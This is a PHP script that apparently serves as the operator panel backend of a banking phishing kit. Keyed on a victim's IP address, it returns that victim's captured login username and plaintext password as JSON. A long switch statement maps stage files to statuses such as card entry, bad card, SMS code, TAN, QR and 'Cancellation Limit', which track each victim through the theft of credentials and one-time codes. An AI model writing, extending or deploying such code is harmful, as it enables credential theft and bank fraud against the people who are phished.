<?php
require_once 'db_config.php'; // Adjust the path as necessary

$userId = isset($_GET['userId']) ? $_GET['userId'] : die("User ID not provided");

// Prepare the SQL statement
$stmt = $conn->prepare("SELECT login_username, password, location FROM main WHERE ip_address =?");
if ($stmt === false) {
    die("Error preparing statement: " . $conn->error);
}

// Bind the parameter and execute the statement
$stmt->bind_param("s", $userId); // "s" indicates the variable type => "s" for string
if (!$stmt->execute()) {
    die("Error executing statement: " . $stmt->error);
}

// Bind the result to variables
$stmt->bind_result($loginUsername, $password, $locationFileName);
if ($stmt->fetch()) {
    // Translate the location file name to user-friendly text
    $locationText = ''; // Initialize $$locationText
    switch ($locationFileName) {
        case 'app.txt':
            $locationText = 'APP';
            break;
        case 'afk.txt':
            $locationText = 'AFK';
            break;
        case 'activation_upload.txt':
            $locationText = 'Activation Uploading..';
            break;
        case 'activation_upload_bad.txt':
            $locationText = 'Bad Activation';
            break;
        case 'cc_bad.txt':
            $locationText = 'Bad CC';
            break;
        case 'cc.txt':
            $locationText = 'CC Inputting..';
            break;
        case 'confirm.txt':
            $locationText = 'Confirm Access';
            break;
        case 'custom.txt':
            $locationText = 'Custom';
            break;
        case 'custom_trn.txt':
            $locationText = 'Custom TRN';
            break;
        case 'custom_limit.txt':
            $locationText = 'Cancellation Limit';
            break;
        case 'login_bad.txt':
            $locationText = 'Bad Login';
            break;
        case 'login.txt':
            $locationText = 'Login..';
            break;
        case 'sms_bad.txt':
            $locationText = 'Bad SMS';
            break;
        case 'sms.txt':
            $locationText = 'SMS..';
            break;
        case 'email.txt':
            $locationText = 'Email Login';
            break;
        case 'email_bad.txt':
            $locationText = 'Email Failed';
            break;
        case 'email_success.txt':
            $locationText = 'Email Success';
            break;
        case 'qr.txt':
            $locationText = 'QR';
            break;
        case 'qr_bad.txt':
            $locationText = 'QR Bad';
            break;
        case 'tan.txt':
            $locationText = 'TAN';
            break;
        case 'tan_bad.txt':
            $locationText = 'TAN Failed';
            break;
        case 'upload_bad.txt':
            $locationText = 'Bad Upload';
            break;
        case 'upload.txt':
            $locationText = 'Uploading..';
            break;
        case 'success.txt':
            $locationText = 'Successful';
            break;
        case 'success_trn.txt':
            $locationText = 'Successful Custom';
            break;
        case 'waiting.txt':
            $locationText = 'Waiting..';
            break;
        case 'waiting_afk.txt':
            $locationText = 'AFK Waiting..';
            break;
        case 'startan.txt':
            $locationText = 'TAN..';
            break;
        case 'startan_bad.txt':
            $locationText = 'TAN Failed..';
            break;
            case 'qr_noinput.txt':
                $locationText = 'QR No Input';
                break;
        default:
            $locationText = 'Unknown (please define in codebase)';
    }

    // Prepare the response
    $response = array(
        'loginUsername' => $loginUsername,
        'password' => $password,
        'locationText' => $locationText
    );

    // Set the content type to application/json
    header('Content-Type: application/json');
    echo json_encode($response);
} else {
    echo json_encode(array('error' => 'Location not found'));
}

// Close the statement
$stmt->close();

// Close the connection
$conn->close();